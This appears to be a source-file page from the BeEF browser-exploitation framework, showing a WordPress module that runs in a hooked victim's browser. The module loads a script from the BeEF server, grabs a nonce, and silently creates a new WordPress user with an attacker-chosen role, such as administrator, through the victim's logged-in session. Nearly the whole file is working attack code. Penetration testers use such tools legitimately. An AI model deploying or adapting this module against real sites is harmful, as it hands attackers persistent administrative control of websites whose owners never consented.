Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/misc/wordpress/add_user/command.js
1154 views
1
/*

2
  Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com

3
  See the file 'doc/COPYING' for copying permission

4


5
  This is a complete rewrite of the original module exploits/wordpress_add_admin which was not working anymore

6
  

7
  Original Author: Daniel Reece (@HBRN8).

8
  Rewritten by Erwan LR (@erwan_lr | WPScanTeam) - https://wpscan.org/

9
*/

10


11


12
beef.execute(function() {

13
  beef_command_url = '<%= @command_url %>';

14
  beef_command_id  = <%= @command_id %>;

15


16
  // Adds wp.js to the DOM so we can use some functions here

17
  if (typeof get_nonce !== 'function') {

18
    var wp_script = document.createElement('script');

19


20
    wp_script.setAttribute('type', 'text/javascript');

21
    wp_script.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/wp.js');

22
    var theparent = document.getElementsByTagName('head')[0];

23
    theparent.insertBefore(wp_script, theparent.firstChild);

24
  }

25


26
  var create_user_path = '<%= @wp_path %>wp-admin/user-new.php';

27


28
  /*

29
    When there is an error (such as incorrect email, username already existing etc),

30
    the response will be a 200 with an ERROR in the body

31
    

32
    When successfully created, it's a 302, however the redirection is followed by the web browser

33
    and the 200 is served directly to the AJAX response here and we don't get the 302,

34
    so we check for the 'New user created.' pattern in the page

35
  */

36
  function check_response_for_error(xhr) {

37
    if (xhr.status == 200) {

38
      responseText = xhr.responseText;

39


40
      if ((matches = /<strong>ERROR<\/strong>: (.*?)<\/p>/.exec(responseText))) {

41
        log('User Creation failed: ' + matches[1], 'error');

42
      }

43
      else if (/New user created/.test(responseText)) {

44
        log('User successfully created!', 'success');

45
      }

46
    }

47
  }

48


49
  function create_user(nonce) {

50
    post(

51
      create_user_path,

52
      {

53
        action: 'createuser',

54
        '_wpnonce_create-user': nonce,

55
        '_wp_http_referer': create_user_path,

56
        user_login: '<%= @username %>',

57
        email: '<%= @email %>',

58
        first_name: '',

59
        last_name: '',

60
        url: '',

61
        pass1: '<%= @password %>',

62
        pass2: '<%= @password %>',

63
        pw_weak: 'on', // Just in case

64
        role: '<%= @role %>',

65
        createuser: 'Add+New+User'

66
      },

67
      function(xhr) { check_response_for_error(xhr) }

68
    );

69
  }

70


71
  // Timeout needed for the wp.js to be loaded first

72
  setTimeout(

73
    function() {

74
      get_nonce(

75
        create_user_path,

76
        '_wpnonce_create-user',

77
        function(nonce) { create_user(nonce) }

78
      )

79
    },

80
    300

81
  );

82


83
});

84


85


86